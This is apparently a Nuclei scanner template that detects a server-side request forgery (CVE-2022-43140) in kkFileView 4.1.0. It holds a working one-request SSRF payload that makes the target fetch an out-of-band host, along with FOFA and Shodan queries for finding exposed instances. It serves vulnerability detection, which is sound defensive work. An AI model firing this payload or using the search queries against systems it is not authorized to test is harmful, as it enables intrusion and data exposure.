nuclei-templates/http/cves/2022/CVE-2022-43140.yaml

38 lines
1.3 KiB
YAML

id: CVE-2022-43140
info:
name: kkFileView 4.1.0 - Server-Side Request Forgery
author: Co5mos
severity: high
description: |
kkFileView 4.1.0 is susceptible to server-side request forgery via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. An attacker can force the application to make arbitrary requests via injection of crafted URLs into the url parameter and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/kekingcn/kkFileView/issues/392
- https://nvd.nist.gov/vuln/detail/CVE-2022-43140
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score: 7.5
cve-id: CVE-2022-43140
cpe: cpe:2.3:a:keking:kkfileview:*:*:*:*:*:*:*:*
epss-score: 0.13314
cwe-id: CWE-918
metadata:
max-request: 1
fofa-query: app="kkFileView"
shodan-query: http.html:"kkFileView"
verified: "true"
tags: cve,cve2022,ssrf,kkFileview
http:
- method: GET
path:
- "{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"
matchers:
- type: word
part: body
words:
- "<h1> Interactsh Server </h1>"
# Enhanced by cs on 2023/04/17